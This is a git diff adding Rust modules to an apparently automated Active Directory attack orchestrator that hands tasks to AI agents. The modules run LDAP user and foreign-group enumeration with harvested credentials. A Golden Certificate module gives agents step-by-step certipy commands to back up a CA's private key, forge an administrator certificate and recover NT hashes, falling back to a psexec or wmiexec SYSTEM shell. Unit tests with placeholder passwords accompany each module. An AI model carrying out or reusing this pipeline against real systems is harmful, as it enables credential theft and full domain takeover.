+/// +/// Pure logic extracted from `auto_domain_user_enum` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_user_enum_work(state: &StateInner) -> Vec<UserEnumWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("user_enum:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_DOMAIN_USER_ENUM, &dedup_key) { + continue; + } + + // Prefer a credential from the target domain. + // Fall back to any available credential (cross-domain LDAP may work). + let cred = match state + .credentials + .iter() + .find(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + state.credentials.iter().find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) { + Some(c) => c.clone(), + None => continue, + }; + + items.push(UserEnumWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Dispatches per-domain LDAP user enumeration. +/// Interval: 45s. +pub async fn auto_domain_user_enum( + dispatcher: Arc<Dispatcher>, + mut shutdown: watch::Receiver<bool>, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("domain_user_enumeration") { + continue; + } + + let work: Vec<UserEnumWork> = { + let state = dispatcher.state.read().await; + collect_user_enum_work(&state) + }; + + for item in work { + let cross_domain = item.credential.domain.to_lowercase() != item.domain.to_lowercase(); + let mut payload = json!({ + "technique": "ldap_user_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "filters": ["(objectCategory=person)(objectClass=user)"], + "attributes": ["sAMAccountName", "description", "memberOf", "userAccountControl", "servicePrincipalName"], + }); + if cross_domain { + payload["bind_domain"] = json!(item.credential.domain); + } + + let priority = dispatcher.effective_priority("domain_user_enumeration"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + cred_user = %item.credential.username, + "Domain user enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_DOMAIN_USER_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_DOMAIN_USER_ENUM, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "Domain user enumeration deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch user enumeration"); + } + } + } + } +} + +struct UserEnumWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("user_enum:{}", "contoso.local"); + assert_eq!(key,
"user_enum:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_DOMAIN_USER_ENUM, "domain_user_enum"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ldap_user_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + "filters": ["(objectCategory=person)(objectClass=user)"], + "attributes": ["sAMAccountName", "description", "memberOf", "userAccountControl", "servicePrincipalName"], + }); + assert_eq!(payload["technique"], "ldap_user_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn ldap_filter_format() { + let filters = ["(objectCategory=person)(objectClass=user)"]; + assert_eq!(filters.len(), 1); + assert!(filters[0].contains("objectCategory=person")); + assert!(filters[0].contains("objectClass=user")); + } + + #[test] + fn ldap_attributes_list() { + let attrs = [ + "sAMAccountName", + "description", + "memberOf", + "userAccountControl", + "servicePrincipalName", + ]; + assert_eq!(attrs.len(), 5); + assert!(attrs.contains(&"sAMAccountName")); + assert!(attrs.contains(&"servicePrincipalName")); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = UserEnumWork { + dedup_key: 
"user_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("user_enum:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "user_enum:contoso.local"); + } + + #[test] + fn credential_quarantine_check_logic() { + // Empty password should be skipped by the credential selection logic + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "".into(), + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + assert!(cred.password.is_empty()); + } + + #[test] + fn cross_domain_credential_fallback() { + // When no same-domain cred exists, any cred can be used (cross-domain LDAP) + let creds = [ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "fabrikam.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }]; + let target_domain = "contoso.local"; + let same_domain = creds.iter().find(|c| { + c.domain.to_lowercase() == target_domain.to_lowercase() && !c.password.is_empty() + }); + assert!(same_domain.is_none()); + let fallback = creds.iter().find(|c| !c.password.is_empty()); + assert!(fallback.is_some()); + assert_eq!(fallback.unwrap().domain, "fabrikam.local"); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + 
discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_user_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_user_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_DOMAIN_USER_ENUM, "user_enum:contoso.local".into()); + let work = collect_user_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_cross_domain_fallback() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam cred available, should fall back + state + .credentials + .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, 
"crossuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } + + #[test] + fn collect_skips_empty_password() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_user_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_falls_back() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "gooduser"); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "user_enum:contoso.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + 
assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/foreign_group_enum.rs b/ares-cli/src/orchestrator/automation/foreign_group_enum.rs new file mode 100644 index 00000000..02ab73be --- /dev/null +++ b/ares-cli/src/orchestrator/automation/foreign_group_enum.rs @@ -0,0 +1,471 @@ +//! auto_foreign_group_enum -- enumerate cross-domain/cross-forest group memberships. +//! +//! Discovers foreign security principals (FSPs) — users/groups from one domain +//! that are members of groups in another domain. This reveals cross-forest and +//! cross-domain attack paths that BloodHound's intra-domain analysis might miss. +//! +//! Dispatches LDAP queries per trust relationship to find: +//! - Foreign users in local groups (e.g., FABRIKAM\jdoe in CONTOSO\TrustedAdmins) +//! - Foreign groups nested in local groups +//! - Domain Local groups with foreign members (the primary FSP container) + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect foreign group enumeration work items from current state. +/// +/// Pure logic extracted from `auto_foreign_group_enum` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. 
+fn collect_foreign_group_work(state: &StateInner) -> Vec<ForeignGroupWork> { + if state.credentials.is_empty() || state.domains.len() < 2 { + return Vec::new(); + } + + let mut items = Vec::new(); + + // For each domain, enumerate foreign security principals + for domain in &state.domains { + let dedup_key = format!("foreign_group:{domain}"); + if state.is_processed(DEDUP_FOREIGN_GROUP_ENUM, &dedup_key) { + continue; + } + + let dc_ip = match state.resolve_dc_ip(domain) { + Some(ip) => ip, + None => continue, + }; + + // Find a credential for this domain + let cred = state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + state.credentials.iter().find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(ForeignGroupWork { + dedup_key, + domain: domain.clone(), + dc_ip, + credential: cred, + }); + } + + items +} + +/// Enumerate cross-domain foreign group memberships. +/// Interval: 45s. +pub async fn auto_foreign_group_enum( + dispatcher: Arc<Dispatcher>, + mut shutdown: watch::Receiver<bool>, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("foreign_group_enum") { + continue; + } + + let work: Vec<ForeignGroupWork> = { + let state = dispatcher.state.read().await; + collect_foreign_group_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "foreign_group_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "filters": [ + "(objectClass=foreignSecurityPrincipal)", + "(&(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=4))" + ], + "attributes": [ + "sAMAccountName", "member", "memberOf", "objectSid", + "groupType", "cn", "distinguishedName" + ], + "instructions": concat!( + "Enumerate Foreign Security Principals and cross-domain group memberships. ", + "1) Query CN=ForeignSecurityPrincipals,DC=... to list all foreign SIDs. ", + "2) Resolve each SID to its source domain user/group using ldapsearch against ", + "the source domain's DC. ", + "3) Query Domain Local groups (groupType bit 4) and check for foreign members. ", + "4) Report each cross-domain membership: source_domain\\source_user -> target_group ", + "(target_domain). These are critical for cross-forest attack paths. ", + "5) Register any discovered cross-domain memberships as vulnerabilities with ", + "vuln_type='foreign_group_membership', source=foreign_user, target=local_group, ", + "domain=target_domain, source_domain=foreign_domain.\n\n", + "IMPORTANT: For each user discovered during FSP enumeration, include them in the ", + "discovered_users array with EXACTLY this JSON format:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"foreign_group_enumeration\", \"memberOf\": [\"Group1\"]}\n", + "Include ALL users found — both foreign principals and local group members." 
+ ), + }); + + let priority = dispatcher.effective_priority("foreign_group_enum"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Foreign group enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_FOREIGN_GROUP_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_FOREIGN_GROUP_ENUM, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "Foreign group enum deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch foreign group enum"); + } + } + } + } +} + +struct ForeignGroupWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("foreign_group:{}", "contoso.local"); + assert_eq!(key, "foreign_group:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_FOREIGN_GROUP_ENUM, "foreign_group_enum"); + } + + #[test] + fn requires_multiple_domains() { + let domains: Vec<String> = vec!["contoso.local".to_string()]; + assert!( + domains.len() < 2, + "Single domain should skip foreign group enum" + ); + } + + #[test] + fn two_domains_meets_requirement() { + let domains: Vec<String> = vec!["contoso.local".to_string(), "fabrikam.local".to_string()]; + assert!(domains.len() >= 2); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "foreign_group_enumeration", + "target_ip": 
"192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "foreign_group_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = ForeignGroupWork { + dedup_key: "foreign_group:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_per_domain() { + let key1 = format!("foreign_group:{}", "contoso.local"); + let key2 = format!("foreign_group:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } + + #[test] + fn foreign_security_principal_resolution() { + // The payload includes credential for cross-domain FSP resolution + let payload = json!({ + "technique": "foreign_group_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + // FSP resolution happens via the credential against the target domain + assert!(payload.get("credential").is_some()); + assert_eq!(payload["technique"], "foreign_group_enumeration"); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), 
+ password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_foreign_group_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_no_work() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_foreign_group_work(&state); + // Requires at least 2 domains + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_foreign_group_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_two_domains_with_creds() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fadmin", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 2); + } + + 
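Review note: the `(groupType:1.2.840.113556.1.4.803:=4)` clause in the dispatched filter asks the DC to do a server-side bitwise AND against `groupType` bit `0x4` (Domain Local / resource groups, the primary FSP container). A minimal sketch of that same bit test, using the standard AD `groupType` constants (values assumed from the AD attribute spec, not taken from this diff):

```rust
/// AD groupType bit for Domain Local (resource) groups. The LDAP matching
/// rule 1.2.840.113556.1.4.803 (LDAP_MATCHING_RULE_BIT_AND) performs this
/// exact test server-side.
const GROUP_TYPE_RESOURCE_GROUP: i64 = 0x4;

fn is_domain_local(group_type: i64) -> bool {
    group_type & GROUP_TYPE_RESOURCE_GROUP != 0
}

fn main() {
    // AD stores groupType as a signed 32-bit value; a security-enabled
    // Domain Local group is typically -2147483644 (0x80000004).
    assert!(is_domain_local(-2_147_483_644));
    // A security-enabled Global group (-2147483646, 0x80000002) does not match.
    assert!(!is_domain_local(-2_147_483_646));
    println!("domain-local bit check ok");
}
```

This is why the filter value is the decimal `4` rather than a full groupType value: the matching rule tests individual bits, not equality.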
#[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed( + DEDUP_FOREIGN_GROUP_ENUM, + "foreign_group:contoso.local".into(), + ); + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_skips_domain_without_dc() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + // Only contoso has a DC + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_quarantined_credential_falls_back() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = 
collect_foreign_group_work(&state); + // Both domains should still get work (gooduser fallback for contoso) + assert_eq!(work.len(), 2); + // contoso should fall back to gooduser + let contoso_work = work.iter().find(|w| w.domain == "contoso.local").unwrap(); + assert_eq!(contoso_work.credential.username, "gooduser"); + } + + #[test] + fn collect_skips_empty_password() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_foreign_group_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 2); + } +} diff --git a/ares-cli/src/orchestrator/automation/golden_cert.rs b/ares-cli/src/orchestrator/automation/golden_cert.rs new file mode 100644 index 00000000..c643cf49 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/golden_cert.rs @@ -0,0 +1,525 @@ +//! auto_golden_cert -- forge a Golden Certificate after owning an ADCS CA host. +//! +//! When a CA host is fully owned (local SYSTEM via lateral movement) and the +//! 
CA's domain is not yet dominated, drive the offline Golden Certificate +//! pipeline: +//! +//! 1. **Backup**: `certipy ca -backup` extracts the CA private key + cert +//! to a PFX (requires SYSTEM/local admin or CA admin rights — owning the +//! CA host satisfies this). +//! 2. **Forge**: `certipy forge -ca-pfx <ca.pfx> -upn administrator@<domain>` +//! produces a client-auth certificate signed by the CA, for any UPN. +//! No DC interaction is needed — purely offline. +//! 3. **Auth**: `certipy auth -pfx forged.pfx -dc-ip <dc_ip>` performs PKINIT +//! to obtain the target user's NT hash. +//! +//! This is the universal terminal for cross-forest compromise: every ADCS- +//! adjacent attack path (ESC1/ESC4/ESC8, MSSQL→xp_cmdshell→host, RBCD → +//! S4U → SYSTEM, shadow creds → admin → host) converges here once the CA +//! host is owned, regardless of which forest the CA lives in. +//! +//! Cross-forest note: the CA's *own* domain credential is what we need for +//! the `certipy ca -backup` RPC call. We pull it via `find_source_credential` +//! / `find_trust_credential` so a cred from the originating forest works +//! when there is no same-domain cred yet. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Watches for owned CA hosts and dispatches Golden Certificate pipelines. +/// Interval: 30s. +pub async fn auto_golden_cert(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("golden_cert") { + continue; + } + + let work: Vec<GoldenCertWork> = { + let state = dispatcher.state.read().await; + collect_golden_cert_work(&state) + }; + + for item in work { + let mut payload = json!({ + "technique": "golden_cert", + "ca_host": item.ca_host, + "ca_hostname": item.ca_hostname, + "domain": item.domain, + "target_user": "administrator", + "target_upn": format!("administrator@{}", item.domain), + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "username": item.credential.username, + "password": item.credential.password, + "objectives": [ + "Step 1 (backup): run `certipy_ca` with backup=true, ca=<ca_name>, username/password from credential, dc_ip=<dc_ip>. Requires SYSTEM or CA admin on the CA host — since this host is owned, you can also run a SYSTEM shell (psexec/wmiexec) and execute certipy locally.", + "Step 2 (forge): run `certipy_forge` with ca_pfx=<ca.pfx>, upn=`administrator@<domain>`. 
Output is a forged client-auth certificate signed by the CA private key — no DC interaction needed.", + "Step 3 (auth): run `certipy_auth` with pfx_path=<forged.pfx>, domain=<domain>, dc_ip=<dc_ip> to PKINIT-authenticate as administrator and recover the NT hash.", + "If you don't yet know the CA name, run `certipy_find` first against this host to discover it (the CA's `Name` / `DNS Name`).", + "If `certipy_ca -backup` fails with an RPC/perm error from a network cred, fall back to a local SYSTEM shell (psexec/wmiexec to ca_host) and run certipy from there — the host is owned.", + ], + }); + + if let Some(ref dc) = item.dc_ip { + payload["dc_ip"] = json!(dc); + payload["target_ip"] = json!(dc); + } + if let Some(ref ca_name) = item.ca_name { + payload["ca_name"] = json!(ca_name); + } + if let Some(ref sid) = item.domain_sid { + payload["domain_sid"] = json!(sid); + payload["admin_sid"] = json!(format!("{sid}-500")); + } + + let priority = dispatcher.effective_priority("golden_cert"); + match dispatcher + .throttled_submit("exploit", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + ca_host = %item.ca_host, + domain = %item.domain, + "Golden Certificate pipeline dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_GOLDEN_CERT, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_GOLDEN_CERT, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(ca_host = %item.ca_host, "Golden Cert deferred by throttler"); + } + Err(e) => { + warn!(err = %e, ca_host = %item.ca_host, "Failed to dispatch Golden Cert"); + } + } + } + } +} + +/// Pure logic so it can be unit-tested without a `Dispatcher` or runtime. 
+fn collect_golden_cert_work(state: &StateInner) -> Vec<GoldenCertWork> { + state + .hosts + .iter() + .filter(|h| h.owned) + .filter_map(|h| { + let host_lower = h.ip.to_lowercase(); + let hostname_lower = h.hostname.to_lowercase(); + + let is_ca = state.shares.iter().any(|s| { + s.name.to_lowercase() == "certenroll" + && (s.host == h.ip || s.host.to_lowercase() == hostname_lower) + }); + if !is_ca { + return None; + } + + let domain = extract_domain_from_fqdn(&h.hostname).and_then(|d| { + if state.domains.iter().any(|known| known.to_lowercase() == d) { + Some(d) + } else { + state + .domains + .iter() + .find(|known| d.ends_with(&format!(".{}", known.to_lowercase()))) + .or_else(|| { + state + .domains + .iter() + .find(|known| known.to_lowercase().ends_with(&format!(".{d}"))) + }) + .cloned() + .or(Some(d)) + } + })?; + + // Don't forge a Golden Cert against a domain we already own. + if state.dominated_domains.contains(&domain) { + return None; + } + + let dedup_key = format!("{}:{}", host_lower, domain.to_lowercase()); + if state.is_processed(DEDUP_GOLDEN_CERT, &dedup_key) { + return None; + } + + // The certipy_ca call needs a credential that authenticates to the + // CA host's domain. Try same-domain first, then trusted-domain + // (cross-forest) as fallback. 
+ let same_domain = state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !c.username.starts_with('$') + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned(); + + let credential = same_domain.or_else(|| state.find_trust_credential(&domain))?; + + let dc_ip = state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned(); + + let domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned(); + + let ca_name = lookup_ca_name(state, &h.ip, &h.hostname); + + Some(GoldenCertWork { + ca_host: h.ip.clone(), + ca_hostname: h.hostname.clone(), + dedup_key, + domain, + dc_ip, + domain_sid, + ca_name, + credential, + }) + }) + .collect() +} + +/// Extract the domain portion of an FQDN ("ca01.contoso.local" -> "contoso.local"). +fn extract_domain_from_fqdn(fqdn: &str) -> Option<String> { + fqdn.to_lowercase() + .split_once('.') + .map(|(_, d)| d.to_string()) +} + +/// Look up a CA name from previously-discovered ADCS vulns on this host. +/// Falls back to None if no `certipy_find` result has populated `ca_name` yet — +/// the LLM agent is instructed to run certipy_find first when this is missing. 
